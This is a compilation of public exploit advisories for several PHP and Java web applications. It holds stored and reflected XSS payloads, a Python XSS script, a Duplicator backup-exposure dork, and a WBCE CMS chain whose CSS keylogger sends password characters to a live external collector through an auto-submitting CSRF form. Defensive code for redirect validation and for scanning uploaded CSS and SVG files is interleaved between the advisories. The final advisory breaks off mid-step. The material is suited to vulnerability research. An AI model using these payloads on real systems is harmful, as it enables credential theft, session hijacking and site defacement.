<pre><code>Exploit Title: Rukovoditel 3.4.1 - Multiple Stored XSS<br />Version: 3.4.1<br />Bugs: Multiple Stored XSS<br />Technology: PHP<br />Vendor URL: https://www.rukovoditel.net/<br />Software Link: https://www.rukovoditel.net/download.php<br />Date found: 24-06-2023<br />Author: Mirabbas Ağalarov<br />Tested on: Linux <br /><br /><br />2. Technical Details & POC<br />========================================<br /> ###XSS-1###<br />========================================<br />Steps:<br />1. Log in to your account<br />2. Create a project (http://localhost/index.php?module=items/items&path=21)<br />3. Add a task<br />4. Open the task<br />5. Add a comment as "<iframe src="https://14.rs"></iframe> "<br /><br /><br />POST /index.php?module=items/comments&action=save&token=FEOZ9jeKuA HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 241<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/index.php?module=items/info&path=21-2/22-1&redirect_to=subentity&gotopage[74]=1<br />Cookie: cookie_test=please_accept_for_session; sid=vftrl4mhmbvdbrvfmb0rb54vo5<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br />form_session_token=FEOZ9jeKuA&path=21-2%2F22-1&fields%5B169%5D=47&fields%5B170%5D=53&fields%5B174%5D=3&description=%3Ciframe+src%3D%22https%3A%2F%2F14.rs%22%3E%3C%2Fiframe%3E+&uploadifive_attachments_upload_attachments=&comments_attachments=<br /><br />===========================<br /> ###XSS-2###<br />===========================<br />1. Go to the admin account<br />2. Go to Configuration => Application<br />3. Set Copyright Text as "<img 
src=x onerror=alert(1)>"<br /><br /><br />POST /index.php?module=configuration/save&redirect_to=configuration/application HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: multipart/form-data; boundary=---------------------------12298384558648010343132232769<br />Content-Length: 2766<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/index.php?module=configuration/application<br />Cookie: cookie_test=please_accept_for_session; sid=vftrl4mhmbvdbrvfmb0rb54vo5<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br />-----------------------------12298384558648010343132232769<br />Content-Disposition: form-data; name="form_session_token"<br /><br />ju271AAoy1<br />-----------------------------12298384558648010343132232769<br />Content-Disposition: form-data; name="CFG[APP_NAME]"<br /><br />Rukovoditel<br />-----------------------------12298384558648010343132232769<br />Content-Disposition: form-data; name="CFG[APP_SHORT_NAME_MOBILE]"<br /><br />ffgsdfgsdfg<br />-----------------------------12298384558648010343132232769<br />Content-Disposition: form-data; name="CFG[APP_SHORT_NAME]"<br /><br />ruko<br />-----------------------------12298384558648010343132232769<br />Content-Disposition: form-data; name="APP_LOGO"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />-----------------------------12298384558648010343132232769<br />Content-Disposition: form-data; name="CFG[APP_LOGO]"<br /><br /><br />-----------------------------12298384558648010343132232769<br />Content-Disposition: form-data; name="CFG[APP_LOGO_URL]"<br /><br /><br 
/>-----------------------------12298384558648010343132232769<br />Content-Disposition: form-data; name="APP_FAVICON"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />-----------------------------12298384558648010343132232769<br />Content-Disposition: form-data; name="CFG[APP_FAVICON]"<br /><br /><br />-----------------------------12298384558648010343132232769<br />Content-Disposition: form-data; name="CFG[APP_COPYRIGHT_NAME]"<br /><br /><img src=x onerror=alert(1)><br />-----------------------------12298384558648010343132232769<br />Content-Disposition: form-data; name="CFG[APP_LANGUAGE]"<br /><br />english.php<br />-----------------------------12298384558648010343132232769<br />Content-Disposition: form-data; name="CFG[APP_SKIN]"<br /><br /><br />-----------------------------12298384558648010343132232769<br />Content-Disposition: form-data; name="CFG[APP_TIMEZONE]"<br /><br />America/New_York<br />-----------------------------12298384558648010343132232769<br />Content-Disposition: form-data; name="CFG[APP_ROWS_PER_PAGE]"<br /><br />10<br />-----------------------------12298384558648010343132232769<br />Content-Disposition: form-data; name="CFG[APP_DATE_FORMAT]"<br /><br />m/d/Y<br />-----------------------------12298384558648010343132232769<br />Content-Disposition: form-data; name="CFG[APP_DATETIME_FORMAT]"<br /><br />m/d/Y H:i<br />-----------------------------12298384558648010343132232769<br />Content-Disposition: form-data; name="CFG[APP_NUMBER_FORMAT]"<br /><br />2/./*<br />-----------------------------12298384558648010343132232769<br />Content-Disposition: form-data; name="CFG[APP_FIRST_DAY_OF_WEEK]"<br /><br />0<br />-----------------------------12298384558648010343132232769<br />Content-Disposition: form-data; name="CFG[DROP_DOWN_MENU_ON_HOVER]"<br /><br />0<br />-----------------------------12298384558648010343132232769<br />Content-Disposition: form-data; name="CFG[DISABLE_CHECK_FOR_UPDATES]"<br /><br />0<br 
/>-----------------------------12298384558648010343132232769--<br /><br /></code></pre>
<pre><code># Exploit Title: Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS)<br /># Date: 2023-06-23<br /># country: Iran<br /># Exploit Author: Amirhossein Bahramizadeh<br /># Category : webapps<br /># Dork : /print.php?nm_member=<br /># Vendor Homepage: https://www.codekop.com/products/source-code-aplikasi-pos-penjualan-barang-kasir-dengan-php-mysql-3.html<br /># Tested on: Windows/Linux<br /># CVE : CVE-2023-36346<br /><br />import requests<br /><br /># Set the target URL and payload<br />url = "http://example.com/print.php"<br />payload = "<script>alert('XSS')</script>"<br /><br /># Build the request parameters. requests URL-encodes query values itself,<br /># so the payload is passed raw: quoting it first with urllib.parse.quote<br /># would double-encode it and the server would see the literal text<br /># %3Cscript%3E instead of markup.<br />params = {<br /> "nm_member": payload<br />}<br /><br /># Send the request and print the response<br />response = requests.get(url, params=params, timeout=10)<br />print(response.text)<br /></code></pre>
<pre><code>Exploit Title: WBCE CMS 1.6.1 - Open Redirect & CSRF<br />Version: 1.6.1<br />Bugs: Open Redirect + CSRF = CSS KEYLOGGING<br />Technology: PHP<br />Vendor URL: https://wbce-cms.org/<br />Software Link: https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1<br />Date found: 03-07-2023<br />Author: Mirabbas Ağalarov<br />Tested on: Linux <br /><br /><br />2. Technical Details & POC<br />========================================<br /><br />1. Log in to your account<br />2. Go to Media (http://localhost/WBCE_CMS-1.6.1/wbce/admin/media/index.php#elf_l1_Lw)<br />3. Then upload an html file (the html file content is as below)<br /><br />'''<br /><html><br /> <head><br /> <title><br /> Login<br /> </title><br /> <style><br /> input[type="password"][value*="q"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/q');}<br /> input[type="password"][value*="w"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/w');}<br /> input[type="password"][value*="e"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/e');}<br /> input[type="password"][value*="r"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/r');}<br /> input[type="password"][value*="t"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/t');}<br /> input[type="password"][value*="y"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/y');}<br /> input[type="password"][value*="u"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/u');}<br /> input[type="password"][value*="i"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/i');}<br /> input[type="password"][value*="o"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/o');}<br /> input[type="password"][value*="p"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/p');}<br /> input[type="password"][value*="a"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/a');}<br /> 
input[type="password"][value*="s"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/s');}<br /> input[type="password"][value*="d"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/d');}<br /> input[type="password"][value*="f"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/f');}<br /> input[type="password"][value*="g"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/g');}<br /> input[type="password"][value*="h"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/h');}<br /> input[type="password"][value*="j"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/j');}<br /> input[type="password"][value*="k"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/k');}<br /> input[type="password"][value*="l"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/l');}<br /> input[type="password"][value*="z"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/z');}<br /> input[type="password"][value*="x"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/x');}<br /> input[type="password"][value*="c"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/c');}<br /> input[type="password"][value*="v"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/v');}<br /> input[type="password"][value*="b"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/b');}<br /> input[type="password"][value*="n"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/n');}<br /> input[type="password"][value*="m"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/m');}<br /> input[type="password"][value*="Q"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/Q');}<br /> input[type="password"][value*="W"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/W');}<br /> input[type="password"][value*="E"]{<br /> 
background-image: url('https://enflownwx6she.x.pipedream.net/E');}<br /> input[type="password"][value*="R"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/R');}<br /> input[type="password"][value*="T"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/T');}<br /> input[type="password"][value*="Y"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/Y');}<br /> input[type="password"][value*="U"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/U');}<br /> input[type="password"][value*="I"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/I');}<br /> input[type="password"][value*="O"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/O');}<br /> input[type="password"][value*="P"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/P');}<br /> input[type="password"][value*="A"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/A');}<br /> input[type="password"][value*="S"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/S');}<br /> input[type="password"][value*="D"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/D');}<br /> input[type="password"][value*="F"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/F');}<br /> input[type="password"][value*="G"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/G');}<br /> input[type="password"][value*="H"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/H');}<br /> input[type="password"][value*="J"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/J');}<br /> input[type="password"][value*="K"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/K');}<br /> input[type="password"][value*="L"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/L');}<br /> input[type="password"][value*="Z"]{<br /> background-image: 
url('https://enflownwx6she.x.pipedream.net/Z');}<br /> input[type="password"][value*="X"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/X');}<br /> input[type="password"][value*="C"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/C');}<br /> input[type="password"][value*="V"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/V');}<br /> input[type="password"][value*="B"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/B');}<br /> input[type="password"][value*="N"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/N');}<br /> input[type="password"][value*="M"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/M');}<br /> input[type="password"][value*="1"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/1');}<br /> input[type="password"][value*="2"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/2');}<br /> input[type="password"][value*="3"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/3');}<br /> input[type="password"][value*="4"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/4');}<br /> input[type="password"][value*="5"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/5');}<br /> input[type="password"][value*="6"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/6');}<br /> input[type="password"][value*="7"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/7');}<br /> input[type="password"][value*="8"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/8');}<br /> input[type="password"][value*="9"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/9');}<br /> input[type="password"][value*="0"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/0');}<br /> input[type="password"][value*="-"]{<br /> background-image: 
url('https://enflownwx6she.x.pipedream.net/-');}<br /> input[type="password"][value*="."]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/.');}<br /> input[type="password"][value*="_"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/%60');}<br /> input[type="password"][value*="@"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/%40');}<br /> input[type="password"][value*="?"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/%3F');}<br /> input[type="password"][value*=">"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/%3E');}<br /> input[type="password"][value*="<"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/%3C');}<br /> input[type="password"][value*="="]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/%3D');}<br /> input[type="password"][value*=":"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/%3A');}<br /> input[type="password"][value*=";"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/%3B');}<br /> </style><br /> </head><br /><body><br /> <label>Please enter username and password</label><br /> <br><br><br /> Password:: <input type="password" /><br /> <script><br /> document.querySelector('input').addEventListener('keyup', (evt)=>{<br /> evt.target.setAttribute('value', evt.target.value);<br /> })<br /> </script><br /></body><br /></html><br />'''<br /><br />4. Then go to the url of the html file (http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html) and copy the url.<br />5. Then log out and go to the login page again (http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php)<br /><br /><br />POST /WBCE_CMS-1.6.1/wbce/admin/login/index.php HTTP/1.1<br />Host: localhost<br />Content-Length: 160<br />Cache-Control: max-age=0<br />sec-ch-ua: <br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: ""<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost<br />
Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: phpsessid-2729-sid=3i7oqonhjf0ug0jl5dfdp4uugg<br />Connection: close<br /><br />url=&username_fieldname=username_3584B221EC89&password_fieldname=password_3584B221EC89&username_3584B221EC89=test&password_3584B221EC89=Hello123%21&submit=Login<br /> <br />6. If you write (https://ATTACKER.com) in the url parameter of the above request, you are redirected to attacker.com.<br />7. We write the html file's url<br /><br />url=http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html<br /><br />8. And create a csrf-poc with csrf.poc.generator<br /><br /><html><br /> <title><br /> This CSRF was found by miri<br /> </title><br /> <body><br /> <h1><br /> CSRF POC<br /> </h1><br /> <form action="http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php" method="POST" enctype="application/x-www-form-urlencoded"><br /> <input type="hidden" name="url" value="http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html" /><br /> </form><br /> <script>document.forms[0].submit();</script><br /> </body><br /></html><br /><br /><br />9. If the victim clicks, it redirects to the html file and this page sends all the victim's keyboard activity to my server.<br /><br /><br />PoC video : https://youtu.be/m-x_rYXTP9E<br /><br /></code></pre>
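Two defender-side checks for the chain above, added here as an example and not code from WBCE CMS or from the advisory: a validator for the login form's url parameter that accepts only relative paths below an assumed allowlist (ALLOWED_REDIRECT_PREFIXES is built from the install path shown in the requests above), and a scanner that flags the password-field attribute-selector pattern in an uploaded stylesheet or HTML file before it is stored under /media/. The sample CSS and the exfil.example host are constructed.

```python
import re
from urllib.parse import unquote, urlsplit

# Assumption: after login the only legitimate destinations are inside the
# admin area.  Anything else, including same-origin files under /media/,
# is refused, which also stops the redirect to the uploaded HTML page.
ALLOWED_REDIRECT_PREFIXES = ("/WBCE_CMS-1.6.1/wbce/admin/",)


def is_safe_redirect(target: str) -> bool:
    """Accept only a relative path below an allowed prefix.

    Absolute URLs are rejected even when they point at our own host, so
    there is no host-comparison logic to get wrong.
    """
    if not target:
        return True  # empty means "use the default landing page"
    # Browsers treat backslashes like slashes, so normalise first or
    # "/\evil.example" would look like a harmless relative path.
    candidate = unquote(target).replace("\\", "/")
    parts = urlsplit(candidate)
    if parts.scheme or parts.netloc:
        return False  # absolute (https://...) or scheme-relative (//host)
    if not candidate.startswith("/"):
        return False
    # Resolve "." and ".." so /admin/../media/x.html cannot slip through.
    segments = []
    for seg in parts.path.split("/"):
        if seg == "..":
            if segments:
                segments.pop()
        elif seg not in ("", "."):
            segments.append(seg)
    trailing = "/" if parts.path.endswith("/") else ""
    normalised = "/" + "/".join(segments) + trailing
    return any(normalised.startswith(p) for p in ALLOWED_REDIRECT_PREFIXES)


# One rule of the keylogger: a substring match on a password field's value
# attribute whose declaration fetches a remote URL.
_PASSWORD_SUBSTRING_RULE = re.compile(
    r'input\s*\[\s*type\s*=\s*["\']?password["\']?\s*\]\s*'
    r'\[\s*value\s*[*^$]=\s*["\']?(?P<char>[^"\'\]]*)["\']?\s*\]'
    r'[^{]*\{(?P<body>[^}]*)\}',
    re.IGNORECASE,
)
_REMOTE_URL = re.compile(r'url\(\s*["\']?(?:https?:)?//', re.IGNORECASE)


def css_keylogger_selectors(css: str) -> list:
    """Return the characters an uploaded stylesheet would leak, if any.

    A non-empty list is the signal to refuse the upload: one such rule is
    already suspicious, dozens of one-character rules each loading a
    remote image is the keylogger signature.
    """
    leaked = []
    for m in _PASSWORD_SUBSTRING_RULE.finditer(css):
        if _REMOTE_URL.search(m.group("body")):
            leaked.append(m.group("char"))
    return leaked


# Constructed sample: three exfiltration rules and one harmless style for
# the same field.  exfil.example stands in for the collector host.
SAMPLE_UPLOAD_CSS = """
input[type="password"][value*="q"]{ background-image: url('https://exfil.example/q');}
input[type="password"][value*="w"]{ background-image: url('https://exfil.example/w');}
input[type="password"][value*="@"]{ background-image: url('https://exfil.example/%40');}
input[type="password"] { border: 1px solid #ccc; background-image: url('/img/lock.png'); }
"""

if __name__ == "__main__":
    for t in ("", "/WBCE_CMS-1.6.1/wbce/admin/index.php", "https://ATTACKER.com",
              "//ATTACKER.com/", "/\\ATTACKER.com",
              "/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html"):
        print(f"{t!r:55} -> {'allow' if is_safe_redirect(t) else 'refuse'}")
    print("leaked characters:", css_keylogger_selectors(SAMPLE_UPLOAD_CSS))
```

The redirect check alone does not close the chain: the login form also needs a CSRF token, and uploads that the server would serve as text/html or image/svg+xml should be refused or served with Content-Disposition: attachment.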
<pre><code>====================================================================================================================================<br />| # Title : WordPress - Duplicator 3.8.8 Backup Disclosure Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0.2(64-bit) | <br />| # Vendor : https://snapcreek.com/duplicator/docs/changelog/ | <br />| # Dork : "/wp-content/backups-dup-pro/" |<br />====================================================================================================================================<br /><br />PoC :<br /><br />[+] Appears to leave backups in a world-accessible directory under the document root, and the plugin exports a backup as a text file that contains sensitive information.<br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] Use payload : "/wp-content/backups-dup-pro/"<br /><br />[+] https://127.0.0.1/blessedbeyondadoubtcom/wp-content/backups-dup-pro/<br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg |<br />=======================================================================================================================================<br /></code></pre>
<pre><code># Exploit Title: Alkacon OpenCMS 15.0 - Multiple Cross-Site Scripting<br /># Date: 1/07/2023<br /># Exploit Author: tmrswrr<br /># Vendor Homepage: http://www.opencms.org<br /># Software Link: https://github.com/alkacon/opencms-core<br /># Version: v15.0<br /><br /><br />POC:<br /><br />1 ) Log in to the demo page, then go to this url<br />https://demo.opencms.org/workplace#!explorer/8b72b2fe-180f-11ee-b326-0242ac11002b!!/sites/livedemo!!/.galleries/livedemo/!!<br />2 ) Click /.galleries/, right click any png file, open the gallery, and write this payload in the search box<br /><img src=. onerror=alert(document.domain)><br />3 ) You will see an alert box<br /><br />POC:<br /><br />1 ) Go to this url, right click any png file, rename the title section and write your payload : <img src=. onerror=alert(document.domain)><br />https://demo.opencms.org/workplace#!explorer/8b72b2fe-180f-11ee-b326-0242ac11002b!!/sites/livedemo!!/230701/ld_go87op3bfy/.galleries/images/!!<br />2 ) You will see an alert box (stored XSS)<br /><br />POC:<br /><br />1 ) Go to this url, right click any png file and choose replace, click change file, choose your svg file<br />and save it<br /><br />svg file:<br /><br /><?xml version="1.0" standalone="no"?><br /><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><br /><br /><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><br /> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/><br /> <script type="text/javascript"><br /> alert("XSS");<br /> </script><br /></svg><br /><br />2 ) When you click this svg file you will see an alert box<br /><br /><br /></code></pre>
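The SVG case above works because an SVG is an XML document that browsers execute when it is opened directly rather than placed in an img tag. The upload gate below is an added example, not OpenCMS code: it parses the file with the standard library (which neither expands external entities nor fetches the DTD) and reports script elements, event-handler attributes and javascript:/data: hrefs. The two sample files are constructed; the first mirrors the payload shape in the advisory.

```python
import xml.etree.ElementTree as ET

# Elements that turn an "image" into an executable document when the SVG
# is served inline and opened as a top-level page.
ACTIVE_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object"}
# Attributes that can carry a URL, including the SMIL "to"/"from" pair
# that <set>/<animate> can use to rewrite an href at runtime.
URL_ATTRIBUTES = {"href", "to", "from"}


def _local(name: str) -> str:
    """Strip the {namespace} prefix ElementTree puts on tags and attributes."""
    return name.rsplit("}", 1)[-1].lower()


def svg_active_content(data: bytes) -> list:
    """Return human-readable findings; an empty list means the file is inert."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    findings = []
    if _local(root.tag) != "svg":
        findings.append(f"root element is <{_local(root.tag)}>, not <svg>")
    for elem in root.iter():
        name = _local(elem.tag)
        if name in ACTIVE_ELEMENTS:
            findings.append(f"<{name}> element")
        for attr, value in elem.attrib.items():
            aname = _local(attr)
            if aname.startswith("on"):
                findings.append(f"event handler {aname} on <{name}>")
            elif aname in URL_ATTRIBUTES:
                # Browsers ignore whitespace and control characters inside
                # the scheme, so "java\nscript:" must count as "javascript:".
                scheme = "".join(value.split()).lower()
                if scheme.startswith(("javascript:", "data:", "vbscript:")):
                    findings.append(f"{aname}={value!r} on <{name}>")
    return findings


# Constructed copy of the payload shape above: a valid drawing with a
# <script> child.  Opened directly, this pops the alert.
UPLOADED_SVG = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">alert("XSS");</script>
</svg>
"""

# Constructed clean file: an ordinary link and shape, which must pass.
CLEAN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <a xlink:href="https://www.opencms.org/"><circle r="5" cx="5" cy="5"/></a>
</svg>
"""

if __name__ == "__main__":
    for label, blob in (("uploaded", UPLOADED_SVG), ("clean", CLEAN_SVG)):
        print(label, "->", svg_active_content(blob) or "inert")
```

Rejecting at upload is the primary control; serving the media tree with Content-Disposition: attachment or a sandbox Content-Security-Policy keeps a file that slips through from running in the site's origin.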
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://www.inoutscripts.com/products/inout-search-engine-ai-edition/ │<br />│ Vendor : Inout Scripts │<br />│ Software : Inout Search Engine AI Edition 1.1 │<br />│ Vuln Type: Reflected XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ An attacker can send the victim a link containing a malicious URL in an email or │<br />│ instant message and perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br /><br />Path: /index.php<br /><br />GET 'page' parameter is vulnerable to RXSS<br /><br />https://website/index.php?page=index%2findexl7fex%3cimg%20src%3da%20onerror%3dalert(1)%3ed392j&type=Web<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://gzscripts.com/vacation-rental-website.html │<br />│ Vendor : GZ Scripts │<br />│ Software : Vacation Rental 1.8 │<br />│ Vuln Type: Stored XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ Allows an attacker to inject malicious code into the website, giving the ability to │<br />│ steal sensitive information, manipulate data, and launch additional attacks. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />## Stored XSS<br /><br />------------------------------------------------------------<br />POST /VacationRentalWebsite/property/8/ad-has-principes/ HTTP/1.1<br /><br />property_id=8&action=detail&send_review=1&cleanliness=0%3B4.2&comfort=0%3B4.2&location=0%3B4.2&service=0%3B4.2&sleep=0%3B4.2&price=0%3B4.2&username=[XSS Payload]&evaluation=3&title=[XSS Payload]&comment=[XSS Payload]&captcha=lbhkyj<br />------------------------------------------------------------<br /><br />POST parameter 'username' is vulnerable to XSS<br />POST parameter 'title' is vulnerable to XSS<br />POST parameter 'comment' is vulnerable to XSS<br /><br /><br /><br />## Steps to Reproduce:<br /><br />1. Surf (as Guest) - Go to any Listed Property<br />2. Go to [Customer Reviews] on this Path (http://website/property/[Number1-9]/[name-of-Property]/#customerReviews)<br />3. Inject your [XSS Payload] in "Username"<br />4. Inject your [XSS Payload] in "Title"<br />5. Inject your 